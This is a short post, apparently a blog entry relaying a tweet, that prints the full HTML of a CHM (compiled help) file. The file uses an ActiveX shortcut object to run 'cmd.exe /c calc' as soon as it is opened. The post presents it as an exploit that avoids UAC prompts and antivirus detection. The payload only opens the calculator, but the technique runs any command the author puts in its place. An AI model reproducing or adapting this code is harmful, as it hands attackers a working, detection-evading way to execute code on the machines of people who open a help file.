Run calc.exe via open Chm file, no UAC warning and no av detects!

powertool on Twitter: “Run calc.exe via open Chm file, no UAC warning and no av detects! Sample : https://t.co/ZntghJcnvZ http://t.co/NncyU0H2QI”: Run calc.exe via open Chm file, no UAC warning and no av detects!

The exploit is:

1. <HTML>
2. <TITLE>Run calc.exe</TITLE>
3. <HEAD>
4. </HEAD>
5. <BODY>
6. <OBJECT id=x classid=”clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11″ width=1 height=1>
7. <PARAM name=”Command” value=”ShortCut”>
8. <PARAM name=”Button” value=”Bitmap::shortcut”>
9. <PARAM name=”Item1″ value=”,cmd.exe,/c calc ,”>
10. <PARAM name=”Item2″ value=”273,1,1″>
11. </OBJECT>
12. <script>
13. x.Click();
14. </SCRIPT>
15. <A name=contents>
16. <H2 align=center>Run calc.exe via open Chm file!!!</H2>
17. <P></A>
18. <H3 ALIGN=CENTER>@ithurricanept</H3><P>
19. </BODY>
20. </HTML>

Proof: